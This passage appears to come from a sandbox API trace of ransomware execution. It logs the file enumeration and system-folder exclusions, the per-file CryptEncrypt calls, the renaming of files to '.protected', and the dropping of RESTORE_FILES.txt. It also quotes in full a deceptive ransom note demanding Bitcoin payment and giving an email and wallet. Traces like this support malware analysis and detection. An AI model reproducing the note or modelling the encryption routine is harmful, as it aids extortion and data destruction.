Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*") returned 152 [0083.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\.") returned 152 [0083.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.421] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.421] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.421] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.421] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\..") returned 153 [0083.421] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.421] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.422] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0083.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.437] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.438] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.438] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.438] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.438] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.438] CloseHandle (hObject=0x168) returned 1 [0083.438] wnsprintfW (in: 
pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.protected") returned 174 [0083.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.protected")) returned 1 [0083.439] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.440] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.440] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\RESTORE_FILES.txt") returned 168 [0083.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.440] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.440] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.441] lstrlenA 
(lpString="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") returned 684 [0083.441] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.441] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.441] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.442] CloseHandle (hObject=0x164) returned 1 [0083.442] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.442] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0083.442] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0083.442] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0083.442] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0083.442] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0083.442] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned 150 [0083.442] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0083.442] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0083.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*") returned 152 [0083.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.442] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.442] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.442] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.442] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.442] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\.") returned 152 [0083.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.442] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.442] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.442] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.442] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.443] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.443] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\..") returned 153 [0083.443] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.443] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.443] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.443] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.443] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.443] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.443] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.443] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.443] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.444] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.444] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.444] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json") returned 164 [0083.444] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.444] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.453] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.453] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.454] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.454] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.454] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.454] CloseHandle (hObject=0x168) returned 1 [0083.454] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.protected") returned 174 [0083.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.protected")) returned 1 [0083.455] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.455] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.455] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\RESTORE_FILES.txt") returned 168 [0083.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.456] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.456] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, 
nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.457] lstrlenA (lpString="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") returned 684 [0083.457] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.457] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.457] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.457] CloseHandle (hObject=0x164) returned 1 [0083.457] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.457] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0083.457] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0083.457] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0083.457] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0083.457] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0083.457] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned 150 [0083.457] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0083.457] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0083.457] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*") returned 152 [0083.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\.") returned 152 [0083.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.458] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
